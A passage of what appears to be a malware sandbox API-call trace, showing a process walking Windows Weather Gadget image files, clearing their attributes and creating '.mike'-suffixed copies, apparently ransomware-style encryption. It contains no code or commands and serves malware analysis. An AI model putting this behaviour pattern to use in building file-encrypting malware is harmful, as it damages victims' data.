lpBuffer=0x225d52c*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x225d52c*, lpNumberOfBytesWritten=0x2af074*=0xab0, lpOverlapped=0x0) returned 1 [0135.022] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_snow.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_snow.png.mike", lpFilePart=0x0) returned 0x5e [0135.022] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_snow.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_snow.png.mike", lpFilePart=0x0) returned 0x5e [0135.023] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_snow.png", dwFileAttributes=0x80) returned 0 [0135.024] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_snow.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_snow.png.mike", lpFilePart=0x0) returned 0x5e [0135.024] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_snow.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_snow.png.mike", lpFilePart=0x0) returned 0x5e [0135.026] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.027] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_thunderstorm.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_thunderstorm.png.mike", lpFilePart=0x0) returned 0x66 [0135.027] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_thunderstorm.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_thunderstorm.png", lpFilePart=0x0) returned 0x61 [0135.034] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_thunderstorm.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_thunderstorm.png.mike", lpFilePart=0x0) returned 0x66 [0135.034] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_thunderstorm.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_thunderstorm.png.mike", lpFilePart=0x0) returned 0x66 [0135.035] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_thunderstorm.png", dwFileAttributes=0x80) returned 0 [0135.036] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_thunderstorm.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_thunderstorm.png.mike", lpFilePart=0x0) returned 0x66 [0135.036] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_thunderstorm.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_thunderstorm.png.mike", lpFilePart=0x0) returned 0x66 [0135.039] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.039] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\grayStateIcon.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\grayStateIcon.png.mike", lpFilePart=0x0) returned 0x5b [0135.040] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\grayStateIcon.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\grayStateIcon.png", lpFilePart=0x0) returned 0x56 [0135.043] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\grayStateIcon.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\grayStateIcon.png.mike", lpFilePart=0x0) returned 0x5b [0135.043] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\grayStateIcon.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\grayStateIcon.png.mike", lpFilePart=0x0) returned 0x5b [0135.044] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\grayStateIcon.png", dwFileAttributes=0x80) returned 0 [0135.045] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\grayStateIcon.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\grayStateIcon.png.mike", lpFilePart=0x0) returned 0x5b [0135.045] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\grayStateIcon.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\grayStateIcon.png.mike", lpFilePart=0x0) returned 0x5b [0135.048] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.048] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\greenStateIcon.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\greenStateIcon.png.mike", lpFilePart=0x0) returned 0x5c [0135.049] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\greenStateIcon.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\greenStateIcon.png", lpFilePart=0x0) returned 0x57 [0135.052] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\greenStateIcon.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\greenStateIcon.png.mike", lpFilePart=0x0) returned 0x5c [0135.052] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\greenStateIcon.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\greenStateIcon.png.mike", lpFilePart=0x0) returned 0x5c [0135.052] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\greenStateIcon.png", dwFileAttributes=0x80) returned 0 [0135.054] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\greenStateIcon.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\greenStateIcon.png.mike", lpFilePart=0x0) returned 0x5c [0135.054] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\greenStateIcon.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\greenStateIcon.png.mike", lpFilePart=0x0) returned 0x5c [0135.056] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.056] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\info.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\info.png.mike", lpFilePart=0x0) returned 0x52 [0135.057] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\info.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\info.png", lpFilePart=0x0) returned 0x4d [0135.061] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\info.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\info.png.mike", lpFilePart=0x0) returned 0x52 [0135.061] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\info.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\info.png.mike", lpFilePart=0x0) returned 0x52 [0135.061] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\info.png", dwFileAttributes=0x80) returned 0 [0135.062] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\info.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\info.png.mike", lpFilePart=0x0) returned 0x52 [0135.063] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\info.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\info.png.mike", lpFilePart=0x0) returned 0x52 [0135.065] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.065] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\notConnectedStateIcon.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\notConnectedStateIcon.png.mike", lpFilePart=0x0) returned 0x63 [0135.066] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\notConnectedStateIcon.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\notConnectedStateIcon.png", lpFilePart=0x0) returned 0x5e [0135.069] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\notConnectedStateIcon.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\notConnectedStateIcon.png.mike", lpFilePart=0x0) returned 0x63 [0135.069] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\notConnectedStateIcon.png", dwFileAttributes=0x80) returned 0 [0135.071] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\notConnectedStateIcon.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\notConnectedStateIcon.png.mike", lpFilePart=0x0) returned 0x63 [0135.071] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\notConnectedStateIcon.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\notConnectedStateIcon.png.mike", lpFilePart=0x0) returned 0x63 [0135.073] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.073] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\redStateIcon.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\redStateIcon.png.mike", lpFilePart=0x0) returned 0x5a [0135.074] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\redStateIcon.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\redStateIcon.png", lpFilePart=0x0) returned 0x55 [0135.077] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\redStateIcon.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\redStateIcon.png.mike", lpFilePart=0x0) returned 0x5a [0135.077] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\redStateIcon.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\redStateIcon.png.mike", lpFilePart=0x0) returned 0x5a [0135.077] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\redStateIcon.png", dwFileAttributes=0x80) returned 0 [0135.079] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\redStateIcon.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\redStateIcon.png.mike", lpFilePart=0x0) returned 0x5a [0135.079] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\redStateIcon.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\redStateIcon.png.mike", lpFilePart=0x0) returned 0x5a [0135.081] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.082] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\search_background.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\search_background.png.mike", lpFilePart=0x0) returned 0x5f [0135.082] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\search_background.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\search_background.png", lpFilePart=0x0) returned 0x5a [0135.086] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\search_background.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\search_background.png.mike", lpFilePart=0x0) returned 0x5f [0135.086] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\search_background.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\search_background.png.mike", lpFilePart=0x0) returned 0x5f [0135.086] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\search_background.png", dwFileAttributes=0x80) returned 0 [0135.088] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\search_background.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\search_background.png.mike", lpFilePart=0x0) returned 0x5f [0135.088] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\search_background.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\search_background.png.mike", lpFilePart=0x0) returned 0x5f [0135.090] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.090] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked-loading.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked-loading.png.mike", lpFilePart=0x0) returned 0x5e [0135.091] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked-loading.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked-loading.png", lpFilePart=0x0) returned 0x59 [0135.097] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked-loading.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked-loading.png.mike", lpFilePart=0x0) returned 0x5e [0135.097] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked-loading.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked-loading.png.mike", lpFilePart=0x0) returned 0x5e [0135.097] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked-loading.png", dwFileAttributes=0x80) returned 0 [0135.099] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked-loading.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked-loading.png.mike", lpFilePart=0x0) returned 0x5e [0135.099] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked-loading.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked-loading.png.mike", lpFilePart=0x0) returned 0x5e [0135.101] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.102] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_cloudy.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_cloudy.png.mike", lpFilePart=0x0) returned 0x63 [0135.102] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_cloudy.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_cloudy.png", lpFilePart=0x0) returned 0x5e [0135.109] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_cloudy.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_cloudy.png.mike", lpFilePart=0x0) returned 0x63 [0135.110] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_cloudy.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_cloudy.png.mike", lpFilePart=0x0) returned 0x63 [0135.110] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_cloudy.png", dwFileAttributes=0x80) returned 0 [0135.111] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_cloudy.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_cloudy.png.mike", lpFilePart=0x0) returned 0x63 [0135.111] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_cloudy.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_cloudy.png.mike", lpFilePart=0x0) returned 0x63 [0135.114] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0135.114] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_few-showers.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_few-showers.png.mike", lpFilePart=0x0) returned 0x68 [0135.115] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_few-showers.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_few-showers.png", lpFilePart=0x0) returned 0x63 [0135.120] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_few-showers.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_few-showers.png.mike", lpFilePart=0x0) returned 0x68 [0135.121] GetFullPathNameW (in: lpFileName="C:\\Program Files 